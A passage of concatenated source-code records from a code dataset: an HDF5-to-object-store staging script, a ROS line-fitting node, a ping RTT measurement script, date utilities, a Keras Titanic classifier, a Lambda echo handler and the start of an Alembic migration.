Currently holds %d objects \"\n \"totalling %g GB\", args.ceph_pool,\n pool_stats['num_objects'], pool_stats['num_bytes'] / 1e9)\n ts_pbs.add(\"ceph_pool\", args.ceph_pool, immutable=True)\n with open(args.ceph_conf, \"r\") as ceph_conf:\n ts_pbs.add(\"ceph_conf\", ceph_conf.readlines(), immutable=True)\n else:\n obj_store = S3ChunkStore.from_url(args.s3_url)\n ts_pbs.add(\"s3_endpoint\", args.s3_url, immutable=True)\n\n target_object_size = args.obj_size * 2 ** 20\n dask_graph = {}\n schedule = dask.threaded.get\n output_keys = []\n h5_store = DictChunkStore(**h5_file['Data'])\n for dataset, arr in h5_store.arrays.iteritems():\n dataset = str(dataset)\n dtype = arr.dtype\n shape = arr.shape\n get = h5_store.get\n if dataset == 'correlator_data':\n # Convert from 2x float32 to complex64 (and swallow last dimension)\n dtype = np.dtype(np.complex64)\n shape = shape[:-1]\n get = lambda d, s, t: h5_store.get(d, s + (slice(0, 2),),\n np.dtype(np.float32)).view(t)[..., 0]\n base_name = obj_store.join(args.base_name, program_block, stream, dataset)\n shape = (min(shape[0], max_dumps),) + shape[1:]\n chunks = generate_chunks(shape, dtype, target_object_size)\n num_chunks = np.prod([len(c) for c in chunks])\n chunk_size = np.prod([c[0] for c in chunks]) * dtype.itemsize\n logger.info(\"Splitting dataset %r with shape %s and dtype %s into %d chunk(s) of \"\n \"~%d bytes each\", base_name, shape, dtype, num_chunks, chunk_size)\n dask_info = {'dtype': dtype, 'shape': shape, 'chunks': chunks}\n ts_pbs.add(dataset, dask_info, immutable=True)\n dsk = {k: (obj_store.put, base_name, s, (get, dataset, s, dtype))\n for k, s in dsk_from_chunks(chunks, 'copy_' + dataset)}\n dask_graph.update(dsk)\n output_keys.extend(dsk.keys())\n with ProgressBar():\n schedule(dask_graph, output_keys)\n logger.info(\"Staging complete...\")\n\n if args.redis is None:\n raw_input(\"You have started a local Redis server. 
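# The staging loop above drives dask with a hand-built graph dict rather than
# dask.array. A toy version of that pattern (standalone sketch; the task
# callable and key names here are made up):
from dask.threaded import get

def put(name, idx):
    return '%s[%d] stored' % (name, idx)

# each graph value is a task tuple: (callable, *args)
graph = {('copy', i): (put, 'correlator_data', i) for i in range(4)}
print(get(graph, list(graph)))  # runs the 4 tasks on a thread pool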
\"\n \"Hit enter to kill this and cleanup.\")\n local_redis.terminate()\n","sub_path":"scripts/h5toobj.py","file_name":"h5toobj.py","file_ext":"py","file_size_in_byte":12715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"535319345","text":"#!/usr/bin/env python\n\nimport rospy\nimport numpy as np\nfrom nav_msgs.msg import Odometry\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom std_msgs.msg import ColorRGBA\nfrom geometry_msgs.msg import PoseStamped, PointStamped, TransformStamped, Point, Point32\nimport sys\nfrom sss_object_detection.msg import line\nimport matplotlib.pyplot as plt\nfrom sensor_msgs.msg import PointCloud\nimport random\n#import open3d as o3d\n#import pyransac3d as pyrsc\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom skimage.measure import LineModelND, ransac\nfrom sklearn.linear_model import LinearRegression, RANSACRegressor\nimport tf2_ros\nimport tf2_geometry_msgs\n\n\nclass sim_sss_detector:\n \n def __init__(self,\n robot_name,\n noise_sigma= 0.001):\n self.noise_sigma = noise_sigma\n self.robot_name = robot_name\n self.prev_pose = None\n self.current_pose = None\n self.robot_msg = None\n self.yaw = None\n self.frame_id = None\n self.stamp = rospy.Time.now()\n self.marked_positions_x = []\n self.marked_positions_y =[]\n self.marked_ns = {}\n self.gt_frame_id = 'gt/{}/base_link'.format(self.robot_name)\n self.published_frame_id = '{}/base_link'.format(self.robot_name)\n self.world_frame_id = \"world_ned\"\n\n self.counter = 0.0\n\n self.inliers = []\n self.A = []\n self.B = []\n self.pcl = []\n #self.points = []\n self.marker3_x ={}\n self.marker3_y= {}\n\n self.X = []\n self.Y = []\n self.tf_buffer = tf2_ros.Buffer()\n self.tf_listener = tf2_ros.TransformListener(self.tf_buffer)\n self.marked_positions = {}\n self.point_list=[]\n #self.tf_buffer = tf2_ros.Buffer()\n #self.tf_listener = tf2_ros.TransformListener(self.tf_buffer)\n self.odom_sub = rospy.Subscriber(\n '/{}/sim/odom'.format(self.robot_name), Odometry,\n self._update_pose)\n self.marked_3_sub = rospy.Subscriber(\n '/{}/sim/marker3'.format(robot_name), PointStamped,\n self.marker3_pose)\n self.intercept_sub = rospy.Subscriber('/{}/sim/intercepts'.format(robot_name), PointCloud, self._point_cloud)\n self.pub_intercept_map = rospy.Publisher('/{}/sim/intercept_points'.format(robot_name), PointStamped, queue_size=10)\n self.pub_fitted_line = rospy.Publisher('/{}/sim/fitted_line'.format(robot_name), Marker, queue_size=10)\n self.pub_predicted_intercept = rospy.Publisher('/{}/sim/predicted_intercepts'.format(robot_name), PointStamped, queue_size=10)\n\n #self.intercept_utm = rospy.Subscriber('/{}/sim/intercepts_utm'.format(robot_name), PointStamped, self._point_cloud)\n\n \n def marker3_pose(self, msg):\n \"\"\"Update prev_pose and current_pose according to the odom msg received\"\"\"\n #print >>sys.stderr, 'robot pose:::::::::::::::::: = \"%s\"' % msg\n\n self.marker3_x = msg.point.x\n self.marker3_y = msg.point.y\n\n #return self.marker3_x, self.marker3_y\n\n\n def _update_pose(self, msg):\n \"\"\"Update pose based on msg from simulated groundtruth odom at /{robot_name}/sim/odom\"\"\"\n \n #print >>sys.stderr, 'robot pose:::::::::::::::::: = \"%s\"' % msg\n\n self.current_pose = self._transform_pose(\n msg.pose, from_frame=msg.header.frame_id).pose\n #print >>sys.stderr, 'self.current_pose:::::::::::::::::: = \"%s\"' % self.current_pose\n\n\n def _point_cloud(self,pts):\n \"\"\"Subscribing to the 
intercept points which are published in map frame\"\"\"\n #print >>sys.stderr, 'Point_Cloud= \"%s\"' % pts\n for i in range(len(pts.points)):\n points_x = pts.points[i].x\n points_y = pts.points[i].y\n points_z = pts.points[i].z\n\n point_list = [points_x, points_y, points_z]\n #print >>sys.stderr, 'point_list = \"%s\"' % point_list\n self.X.append(point_list[0])\n self.Y.append(point_list[1])\n self.pcl.append(point_list)\n points_np = np.array(self.pcl)\n\n\n \"\"\"Publishing the latest intercepts as Point Stamped \"\"\"\n intercept_point = PointStamped()\n intercept_point.header.frame_id = \"map\"\n intercept_point.header.stamp = rospy.Time(0)\n intercept_point.point.x = np.float64(points_np[len(points_np)-1][0])\n intercept_point.point.y = np.float64(points_np[len(points_np)-1][1])\n intercept_point.point.z = np.float64(points_np[len(points_np)-1][2])\n self.pub_intercept_map.publish(intercept_point)\n\n #print >>sys.stderr, 'y = \"%s\"' % points_np[len(points_np)-1][1]\n #print >>sys.stderr, 'x = \"%s\"' % points_np[len(points_np)-1][0]\n \n \"\"\"Using RANSAC to fit a line ,\n fitting the after the robot has passed y = 8 and has 25 samples to fit a line with\"\"\"\n #r = rospy.Rate(15.)\n \n \n if points_np[len(points_np)-1][1] >= 15:\n #print >>sys.stderr, 'counter1 = \"%s\"' % self.counter \n #print >>sys.stderr, 'range1 = \"%s\"' % int(points_np[len(points_np)-1][1])\n #if self.counter <= int(points_np[len(points_np)-1][1]):\n #print >>sys.stderr, 'counter2 = \"%s\"' % self.counter \n #print >>sys.stderr, 'range2 = \"%s\"' % int(points_np[len(points_np)-1][1])\n \"\"\"Changing the corrdinates as in the moving point cloud self.Y increases as the robot moves forward\"\"\"\n X= np.array(self.Y)\n y= np.array(self.X)\n \n ransac = RANSACRegressor(LinearRegression(), \n max_trials=100, \n min_samples=10, \n residual_threshold=0.001)\n ransac.fit(X.reshape(-1,1), y)\n inlier_mask = ransac.inlier_mask_\n outlier_mask = np.logical_not(inlier_mask)\n \n #line_X = np.arange(3, 14, 1)\n #line_y_ransac = ransac.predict(line_X[:, np.newaxis]) \n # fig = plt.figure()\n # ax = fig.add_subplot(111)\n # ax.scatter(X[inlier_mask], y[inlier_mask], c='blue', marker='o', label='Inliers')\n # ax.scatter(X[outlier_mask], y[outlier_mask], c='lightgreen', marker='s', label='Outliers') \n # ax.plot(line_X, line_y_ransac, color='red') \n #print >>sys.stderr,'Slope: \"%.3f\"' % ransac.estimator_.coef_[0]\n #print >>sys.stderr,'Intercept: \"%.3f\"' % ransac.estimator_.intercept_\n\n predicted_intercept_map =PointStamped()\n predicted_intercept_map.header.frame_id = \"map\"\n predicted_intercept_map.header.stamp = rospy.Time(0)\n x_pred = np.float64(X[len(X)-1]+5.0)\n #self.counter = int(x_pred)\n m_slope = ransac.estimator_.coef_[0]\n #print >>sys.stderr,'m_slope: ' % m_slope\n c_intercept = ransac.estimator_.intercept_\n #print >>sys.stderr,'c_intercept: ' % c_intercept\n y_pred = (x_pred*m_slope) + c_intercept\n\n \"\"\" Changing the coordinates back to its original form while publishing\"\"\"\n predicted_intercept_map.point.x = y_pred\n predicted_intercept_map.point.y = x_pred\n predicted_intercept_map = self._transform_pose_2_utm_intercept(predicted_intercept_map,predicted_intercept_map.header.frame_id)\n\n \"\"\"Publishing the predicted intercepts in utm frame\"\"\"\n predicted_intercept = PointStamped()\n predicted_intercept.point.x = predicted_intercept_map.pose.position.x\n predicted_intercept.point.y = predicted_intercept_map.pose.position.y\n predicted_intercept.header.frame_id = 
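# Standalone sketch of the RANSAC line fit used above, on synthetic data so
# the recovered slope/intercept are known: sklearn's RANSACRegressor wraps
# LinearRegression and exposes the fit via estimator_.coef_ / intercept_.
import numpy as np
from sklearn.linear_model import LinearRegression, RANSACRegressor

X = np.arange(50, dtype=float)
y = 0.5 * X + 2.0
y[::10] += 8.0  # a few gross outliers for RANSAC to reject
ransac = RANSACRegressor(LinearRegression(), residual_threshold=0.5)
ransac.fit(X.reshape(-1, 1), y)
print(ransac.estimator_.coef_[0], ransac.estimator_.intercept_)  # ~0.5, ~2.0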
predicted_intercept_map.header.frame_id\n\n self.pub_predicted_intercept.publish(predicted_intercept)\n #rospy.sleep(3.0)\n #plt.show()\n \n \n \"\"\"Fit a line using 3D points\"\"\"\n \"\"\"\n print >>sys.stderr, 'points = \"%s\"' % points_np\n model_robust, inliers = ransac(points_np, LineModelND, min_samples=2,\n residual_threshold=1, max_trials=100)\n #print(inliers)\n outliers = inliers == False\n line_x = np.arange(-5.1, -4.85, 0.01)\n #line_y = model.predict_y(line_x)\n line_y_robust = model_robust.predict_y(line_x)\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(points_np[inliers][:, 0], points_np[inliers][:, 1], points_np[inliers][:, 2], c='b',\n marker='o', label='Inlier data')\n ax.scatter(points_np[outliers][:, 0], points_np[outliers][:, 1], points_np[outliers][:, 2], c='r',\n marker='o', label='Outlier data')\n ax.set_ylim([3,14])\n ax.plot(line_x, line_y_robust, '-b', label='Robust line model')\n ax.legend(loc='lower left')\n print >>sys.stderr,'Slope: \"%.3f\"' % model_robust.estimator_.coef_[0]\n print >>sys.stderr,'Intercept: \"%.3f\"' % model_robust.estimator_.intercept_\n plt.show()\n \"\"\"\n\n \"\"\"Same as above, fit a line with 3d points\"\"\"\n \"\"\"\n print >>sys.stderr, 'points = \"%s\"' % points_np\n print >>sys.stderr, 'points = \"%s\"' % type(points)\n\n print >>sys.stderr, 'self.pcl = \"%s\"' % self.pcl\n\n self.A, self.B, self.inliers = self._Ransacc(points_np)\n\n print >>sys.stderr, 'self.A= \"%s\"' % self.A\n print >>sys.stderr, 'self.B= \"%s\"' % self.B\n print >>sys.stderr, 'self.inliers= \"%s\"' % self.inliers\n \"\"\"\n \"\"\"\n def _Ransacc(self, pts, thresh=0.2, maxIteration=1000):\n n_points = pts.shape[0]\n best_inliers = []\n\n for it in range(maxIteration):\n\n # Samples 2 random points\n id_samples = random.sample(range(0, n_points), 2)\n pt_samples = pts[id_samples]\n\n # The line defined by two points is defined as P2 - P1\n vecA = pt_samples[1, :] - pt_samples[0, :]\n vecA_norm = vecA / np.linalg.norm(vecA)\n\n # Distance from a point to a line\n pt_id_inliers = [] # list of inliers ids\n vecC_stakado = np.stack([vecA_norm] * n_points, 0)\n dist_pt = np.cross(vecC_stakado, (pt_samples[0, :] - pts))\n dist_pt = np.linalg.norm(dist_pt, axis=1)\n\n # Select indexes where distance is biggers than the threshold\n pt_id_inliers = np.where(np.abs(dist_pt) <= thresh)[0]\n\n if len(pt_id_inliers) > len(best_inliers):\n best_inliers = pt_id_inliers\n self.inliers = best_inliers\n self.A = vecA_norm\n self.B = pt_samples[0, :]\n \n return self.A, self.B, self.inliers\n \"\"\"\n\n def _wait_for_transform(self, from_frame, to_frame):\n \"\"\"Wait for transform from from_frame to to_frame\"\"\"\n trans = None\n while trans is None:\n try:\n trans = self.tf_buffer.lookup_transform(\n to_frame, from_frame, rospy.Time())\n except (tf2_ros.LookupException, tf2_ros.ConnectivityException,\n tf2_ros.ExtrapolationException) as error:\n print('Failed to transform. 
Error: {}'.format(error))\n return trans \n def _transform_pose_2_utm_intercept(self, predicted_point, from_frame):\n \"\"\"Transform intercepts from map frame to utm frame and shifting the x by 2 units, so that \n when robot tries to goto this waypoint it doesn't hits the rope\"\"\"\n pose =PoseStamped()\n pose.pose.position.x = predicted_point.point.x\n pose.pose.position.y = predicted_point.point.y\n pose.pose.position.z = 0.0\n trans = self._wait_for_transform(from_frame=from_frame,\n to_frame=\"utm\")\n pose_transformed = tf2_geometry_msgs.do_transform_pose(pose, trans)\n return pose_transformed \n\n def _transform_pose(self, pose, from_frame):\n trans = self._wait_for_transform(from_frame=from_frame,\n to_frame=self.gt_frame_id)\n pose_transformed = tf2_geometry_msgs.do_transform_pose(pose, trans)\n return pose_transformed\n\n def _rviz_line(self,X, Y):\n marker_line = Marker()\n marker_line.header.frame_id = self.published_frame_id\n marker_line.header.stamp =rospy.Time.now()\n marker_line.type = marker_line.LINE_STRIP\n marker_line.action = marker_line.ADD\n\n # marker scale\n marker_line.scale.x = 0.03\n marker_line.scale.y = 0.03\n marker_line.scale.z = 0.0\n\n # marker color\n\n marker_line.color.a = 1.0\n marker_line.color.r = 1.0\n marker_line.color.g = 1.0\n marker_line.color.b = 1.0\n\n\n # marker orientaiton\n marker_line.pose.orientation.x = 0.0\n marker_line.pose.orientation.y = 0.0\n marker_line.pose.orientation.z = 0.0\n marker_line.pose.orientation.w = 1.0\n\n # marker position\n marker_line.pose.position.x = 0.0\n marker_line.pose.position.y = 0.0\n marker_line.pose.position.z = 0.0\n #print >>sys.stderr, 'X = \"%s\"' % X\n #print >>sys.stderr, 'Y = \"%s\"' % Y\n # marker line points\n marker_line.points = []\n # first point\n first_line_point = Point()\n first_line_point.x = X[0]\n first_line_point.y = Y[0]\n first_line_point.z = 0.0\n marker_line.points.append(first_line_point)\n # second point\n second_line_point = Point()\n second_line_point.x = X[1]\n second_line_point.y = Y[1]\n second_line_point.z = 0.0\n marker_line.points.append(second_line_point)\n\n # Publish the Marker\n self.pub_fitted_line.publish(marker_line)\n\ndef main():\n rospy.init_node('sim_lines_wf', anonymous=True)\n rospy.Rate(5) # ROS Rate at 5Hz\n\n robot_name_param = '~robot_name'\n if rospy.has_param(robot_name_param):\n robot_name = rospy.get_param(robot_name_param)\n print('Getting robot_name = {} from param server'.format(robot_name))\n else:\n robot_name = 'sam'\n print('{} param not found in param server.\\n'.format(robot_name_param))\n print('Setting robot_name = {} default value.'.format(robot_name))\n\n detector = sim_sss_detector(robot_name=robot_name)\n\n while not rospy.is_shutdown():\n rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sss_object_detection/scripts/sim_lines_wf.py","file_name":"sim_lines_wf.py","file_ext":"py","file_size_in_byte":14738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"188602957","text":"import json\nimport subprocess\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plot\nfrom matplotlib.backends import backend_pdf\n\nhostnames = []\nwith open('alexa_top_100', 'r') as f:\n\tfor i in range(100):\n\t\thost_with_line = f.readline()\n\t\thost = host_with_line.split(\"\\n\")[0]\n\t\thostnames.append(host)\n\ndef run_ping(hostnames, num_packets, raw_ping_output_filename, aggregate_ping_output_filename):\n\trtts = {}\n\tfor host in hostnames:\n\t\targs = 'ping -c ' + 
str(num_packets + 1) + ' ' + host\n\t\tp = subprocess.Popen(args, stdout=subprocess.PIPE, shell=True)\n\t\toutput = p.communicate()[0]\n\t\toutput = str(output)\n\t\toutput_arr = output.split('\\n')\n\t\tfor line in output_arr:\n\t\t\ttime_re = re.compile('time=(\\d+\\.\\d+)')\n\t\t\tmatch = time_re.search(line)\n\t\t\ttime = -1.0\n\t\t\tif match:\n\t\t\t\ttime_str = match.group(0)[5:]\n\t\t\t\ttime = float(time_str)\n\t\t\telse:\n\t\t\t\tif \"Request timeout\" not in line:\n\t\t\t\t\tcontinue\n\t\t\tif rtts.has_key(host):\n\t\t\t\toriginal = rtts[host]\n\t\t\t\tnew = original + [time]\n\t\t\t\trtts[host] = new\n\t\t\telse:\n\t\t\t\trtts[host] = [time]\n\traw_output = json.dumps(rtts)\n\twith open(raw_ping_output_filename, 'w') as f:\n\t\tf.write(raw_output)\n\tagg_rtts = {}\n\tfor host in rtts:\n\t\tsent_packets = [x for x in rtts[host] if x != -1.0]\n\t\tmax_rtt = -1.0\n\t\tmedian_rtt = -1.0\n\t\tif len(sent_packets) != 0:\n\t\t\tmax_rtt = np.amax(sent_packets)\n\t\t\tmedian_rtt = np.median(sent_packets)\n\t\tnum_drops = rtts[host].count(-1.0)\n\t\tnum_packets = len(rtts[host])\n\t\tdrop_rate = 1.0 * num_drops / num_packets\n\t\tresult_dict = {'drop_rate': drop_rate, 'max_rtt': max_rtt, 'median_rtt': median_rtt}\n\t\tagg_rtts[host] = result_dict\n\tagg_output = json.dumps(agg_rtts)\n\twith open(aggregate_ping_output_filename, 'w') as f:\n\t\tf.write(agg_output)\n\ndef plot_median_rtt_cdf(agg_ping_results_filename, output_cdf_filename):\n\tx_values = [0]\n\ty_values = [0]\n\tplot.plot(x_values, y_values, label=\"Median RTTs\")\n\tplot.legend()\n\tplot.grid()\n\tplot.xlabel(\"x axis\")\n\tplot.ylabel(\"y axis\")\n\tplot.show()\n\tfilepath = 'median_rtt_plot.pdf'\n\twith backend_pdf.PdfPages(filepath) as pdf:\n\t\tpdf.savefig()\n\ndef plot_ping_cdf(raw_ping_results_filename, output_cdf_filename):\n\tx_values = [0]\n\ty_values = [0]\n\tplot.plot(x_values, y_values, label=\"Pings\")\n\tplot.legend()\n\tplot.grid()\n\tplot.xlabel(\"x axis\")\n\tplot.ylabel(\"y axis\")\n\tplot.show()\n\tfilepath = 'ping_plot.pdf'\n\twith backend_pdf.PdfPages(filepath) as pdf:\n\t\tpdf.savefig()\n\nrun_ping(hostnames, 10, 'rtt_a_raw.json', 'rtt_a_agg.json')\n","sub_path":"proj3_measurement/rtts2.py","file_name":"rtts2.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"77350220","text":"'''\nCreated on Mar 11, 2010\n\n@author: jared.oyler\n\n##Modified by Tony Chang 03/21/2014 for python 3.x\n'''\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom calendar import Calendar\nimport calendar\nimport numpy\n\nA_DAY = timedelta(days=1)\nA_WEEK = timedelta(days=7)\nTWO_WEEKS = timedelta(days=14)\n\nDATE=\"DATE\"\nYMD=\"YMD\"\nYEAR=\"YEAR\"\nMONTH=\"MONTH\"\nDAY=\"DAY\"\nYDAY=\"YDAY\"\n\nMTH_SRT_END_DATES = {1:(datetime(2003,1,1),datetime(2003,1,31)),\n 2:(datetime(2003,2,1),datetime(2003,2,28)),\n 3:(datetime(2003,3,1),datetime(2003,3,31)),\n 4:(datetime(2003,4,1),datetime(2003,4,30)),\n 5:(datetime(2003,5,1),datetime(2003,5,31)),\n 6:(datetime(2003,6,1),datetime(2003,6,30)),\n 7:(datetime(2003,7,1),datetime(2003,7,31)),\n 8:(datetime(2003,8,1),datetime(2003,8,31)),\n 9:(datetime(2003,9,1),datetime(2003,9,30)),\n 10:(datetime(2003,10,1),datetime(2003,10,31)),\n 11:(datetime(2003,11,1),datetime(2003,11,30)),\n 12:(datetime(2003,12,1),datetime(2003,12,31))}\n\ndef get_date_array_from_strings(strings,format=\"%Y-%m-%d\"):\n \n return numpy.array([datetime.strptime(date,format) for date in strings])\n\ndef 
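# plot_median_rtt_cdf/plot_ping_cdf in rtts2.py above are placeholders that
# plot a single (0, 0) point. An empirical CDF of the median RTTs would be
# computed like this (sketch; the file layout is assumed to match what
# run_ping writes to rtt_a_agg.json, with -1.0 marking unreachable hosts):
import json
import numpy as np

def ecdf(values):
    xs = np.sort(np.asarray(values, dtype=float))
    ys = np.arange(1, len(xs) + 1) / float(len(xs))  # P(X <= x)
    return xs, ys

with open('rtt_a_agg.json') as f:
    agg = json.load(f)
medians = [v['median_rtt'] for v in agg.values() if v['median_rtt'] != -1.0]
x_values, y_values = ecdf(medians)  # feed these to plot.plot(...)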
get_date_array(str_date,end_date):\n \n date=str_date\n dates=[]\n while date <= end_date:\n dates.append(date)\n date=date + A_DAY\n return numpy.array(dates)\n\ndef get_year_array(dates):\n years=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n years[x] = dates[x].year\n return years\n\ndef get_year_day_array(dates):\n days=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n days[x] = dates[x].timetuple().tm_yday\n return days\n\ndef get_month_day_array(dates):\n days=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n days[x] = dates[x].day\n return days\n\ndef get_month_array(dates):\n months=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n months[x] = dates[x].month\n return months\n\ndef get_ymd_array(dates):\n ymds=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n ymds[x] = ymdL(dates[x])\n return ymds\n\ndef get_md_array(dates):\n mds=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n mds[x] = mdL(dates[x])\n return mds\n\ndef get_mth_str_end_dates(mth,yr):\n num_days = calendar.monthrange(yr,mth)[1]\n str_date = datetime(yr,mth,1)\n end_date = str_date + timedelta(days=int(num_days)-1)\n return str_date,end_date\n\ndef get_day_array(year,month):\n return numpy.arange(1,calendar.monthrange(year, month)[1]+1)\n\ndef dates_in_dates(dates,all_dates):\n ymds = get_ymd_array(dates)\n all_ymds = get_ymd_array(all_dates)\n \n return numpy.in1d(all_ymds, ymds, assume_unique=True)\n \ndef ymdL_to_date(ymd):\n return datetime.strptime(str(ymd),\"%Y%m%d\")\n\ndef mdL(date):\n return int(datetime.strftime(date,\"%m%d\"))\n \ndef ymdL(date):\n try:\n return int(datetime.strftime(date,\"%Y%m%d\"))\n except ValueError:\n return int(\"%d%02d%02d\"%(date.year,date.month,date.day))\n\ndef get_days_metadata(srtDate=datetime(1948,1,1),endDate=datetime(2011,12,31)):\n\n dates = get_date_array(srtDate, endDate)\n days_metadata = numpy.recarray(dates.size,dtype=[(DATE,numpy.object_),(YEAR,numpy.int32),(MONTH,numpy.int32),(DAY,numpy.int32),(YDAY,numpy.int32),(YMD,numpy.int32)])\n days_metadata[DATE] = dates\n days_metadata[YEAR] = get_year_array(dates)\n days_metadata[MONTH] = get_month_array(dates)\n days_metadata[DAY] = get_month_day_array(dates)\n days_metadata[YDAY] = get_year_day_array(dates)\n days_metadata[YMD] = get_ymd_array(dates)\n return days_metadata\n\ndef get_days_metadata_dates(dates):\n\n days_metadata = numpy.recarray(dates.size,dtype=[(DATE,numpy.object_),(YEAR,numpy.int32),(MONTH,numpy.int32),(DAY,numpy.int32),(YDAY,numpy.int32),(YMD,numpy.int32)])\n days_metadata[DATE] = dates\n days_metadata[YEAR] = get_year_array(dates)\n days_metadata[MONTH] = get_month_array(dates)\n days_metadata[DAY] = get_month_day_array(dates)\n days_metadata[YDAY] = get_year_day_array(dates)\n days_metadata[YMD] = get_ymd_array(dates)\n return days_metadata \n\ndef get_mth_metadata(str_yr,end_yr):\n \n dates = get_date_mth_array(str_yr, end_yr)\n mth_metadata = numpy.recarray(dates.size,dtype=[(DATE,numpy.object_),(YEAR,numpy.int32),(MONTH,numpy.int32),(YMD,numpy.int32)])\n mth_metadata[DATE] = dates\n mth_metadata[YEAR] = get_year_array(dates)\n mth_metadata[MONTH] = get_month_array(dates)\n mth_metadata[YMD] = get_ymd_array(dates)\n return mth_metadata\n\ndef 
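# The get_*_array helpers above walk Python datetimes one element at a time;
# the same year/month/day/yday/YMD columns fall out of a vectorized pandas
# DatetimeIndex. Independent sketch -- util_dates itself predates this style:
import pandas as pd
dates = pd.date_range('1948-01-01', '1948-01-05', freq='D')
print(dates.year.values)       # [1948 1948 1948 1948 1948]
print(dates.month.values)      # [1 1 1 1 1]
print(dates.day.values)        # [1 2 3 4 5]
print(dates.dayofyear.values)  # [1 2 3 4 5]
print(dates.strftime('%Y%m%d').astype(int).values)  # YMD ints, as in ymdL()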
get_date_yr_array(str_yr,end_yr):\n \n yrs = numpy.arange(str_yr,end_yr+1)\n \n dates=[]\n for yr in yrs:\n \n dates.append(datetime(yr,1,1))\n \n return numpy.array(dates)\n\ndef get_date_mth_array(str_yr,end_yr):\n \n yrs = numpy.arange(str_yr,end_yr+1)\n mths = numpy.arange(1,13)\n \n dates=[]\n for yr in yrs:\n \n for mth in mths:\n \n dates.append(datetime(yr,mth,1))\n \n return numpy.array(dates) ","sub_path":"climate/util_dates.py","file_name":"util_dates.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"316250606","text":"import pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom common import process_data\nfrom common import statistics as stat\nimport time\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, BatchNormalization\nfrom keras.regularizers import l2\nfrom common import load_csv\nfrom common import process_data_from_Yassine\n\n# turn off warning: SettingWithCopyWarning\npd.set_option('chained_assignment', None)\n\n# x, y = load_csv.load_data(True)\n# x_train = process_data.get_clean_data(x)\n# x_train = x_train.drop(['Survived'], axis=1)\n\nprocess_data = process_data_from_Yassine.ProcessData(train_data_ratio=0.9)\nprocess_data.feature_engineering()\ntrain_data = process_data.get_train_data()\ny = train_data.Survived\nx_train = train_data.drop(['Survived'], axis=1)\n\n# x_train = process_data.get_feature_importances(x_train.columns.values, x_train.values, y.values)\n# stat.show_statistics(x)\n\nprint('x_train.shape: ', x_train.shape)\nprint('x_train.columns => \\n', x_train.columns.values)\nprint('y.shape: ', y.shape)\n\nx_train = StandardScaler().fit_transform(x_train.values)\n\nmodel = Sequential()\nmodel.add(Dense(units=30, input_dim=x_train.shape[1], kernel_regularizer=l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\n# model.add(Dense(units=30, input_dim=9,\n# # kernel_initializer='uniform',\n# kernel_regularizer=l2(0.01),\n# activation='relu'))\nmodel.add(Dense(units=30, kernel_regularizer=l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dense(units=30, kernel_regularizer=l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dense(units=30, kernel_regularizer=l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.4))\nmodel.add(Dense(units=1, activation='sigmoid'))\nprint(model.summary())\n\nepochs = 30\n# from keras.optimizers import Adam\n# learning_rate = 0.001\n# adam = Adam(lr=learning_rate, decay=0.0001)\n# model.compile(loss='binary_crossentropy',\n# optimizer=adam, metrics=['accuracy'])\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam', metrics=['accuracy'])\nstart = time.time()\ntrain_history = model.fit(x=x_train,\n y=y,\n validation_split=0.1,\n epochs=epochs,\n shuffle=True,\n batch_size=20, verbose=2)\ntrain_acc, validation_acc = stat.show_train_history(train_history, epochs, 'acc', 'val_acc', 'accuracy')\ntrain_loss, validation_loss = stat.show_train_history(train_history, epochs, 'loss', 'val_loss', 'loss')\n\nend = time.time()\nelapsed_train_time = 'elapsed training time: {} min, {} sec '.format(int((end - start) / 60), int((end - start) % 60))\nprint(elapsed_train_time)\n\nmodel.save('mlp_train_model.h5')\n\nwith open('mlp_train_info.txt', 'w') as file:\n file.write(elapsed_train_time+'\\n')\n file.write('train accuracy = {}, validation accuracy = 
{}\\n'.format(train_acc, validation_acc))\n file.write('train loss = {}, validation loss = {}\\n'.format(train_loss, validation_loss))\n","sub_path":"submission/submission16/mlp_train.py","file_name":"mlp_train.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"37062718","text":"# -*- coding: utf-8 -*-\n\n\ndef handler(event, context):\n\n res = {}\n res['method'] = event['context']['http-method']\n res['url'] = event['params']['path']\n res['query-string'] = event['params']['querystring']\n res['json-body'] = event['body-json']\n\n return res","sub_path":"dev/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"142965381","text":"\"\"\"empty message\n\nRevision ID: e4b34b113a6a\nRevises: 4fe0f80e5015\nCreate Date: 2021-09-16 00:21:33.668579\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as 